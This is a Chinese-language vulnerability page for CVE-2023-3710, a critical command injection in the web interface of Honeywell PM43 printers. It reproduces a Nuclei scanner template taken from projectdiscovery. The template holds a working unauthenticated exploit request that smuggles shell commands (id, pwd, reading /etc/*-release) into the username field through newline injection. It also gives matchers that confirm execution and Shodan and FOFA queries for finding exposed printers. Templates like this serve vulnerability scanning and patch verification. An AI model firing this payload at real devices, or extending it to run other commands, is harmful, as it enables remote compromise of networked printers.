CVE-2023-3710: Honeywell PM43 Printers - Command Injection

日期: 2025-08-01 | 影响软件: Honeywell PM43 Printers | POC: 已公开

漏洞描述

Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)

PoC代码[已公开]

id: CVE-2023-3710

info:
  name: Honeywell PM43 Printers - Command Injection
  author: win3zz
  severity: critical
  description: |
    Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3710
    - https://github.com/vpxuser/CVE-2023-3710-POC
    - https://twitter.com/win3zz/status/1713451282344853634
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3710
    cwe-id: CWE-77,CWE-20
    epss-score: 0.91702
    epss-percentile: 0.9967
    cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: honeywell
    product: pm43_firmware
    shodan-query: http.html:"/main/login.lua?pageid="
    fofa-query: body="/main/login.lua?pageid="
  tags: cve2023,cve,honeywell,pm43,printer,iot,rce

http:
  - raw:
      - |
        POST /loadfile.lp?pageid=Configure HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: word
        part: body
        words:
          - 'Release date'

      - type: status
        status:
          - 200
# digest: 490a0046304402206ca9330261c5b21ea04c0778630afb7bf0428f3750a4bfb8b66765ea40c8db14022035ba740d0aab5ed8c1763321c771d58a1c68120c8f58af8e96c9f35de3632060:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-3710.yaml

相关漏洞推荐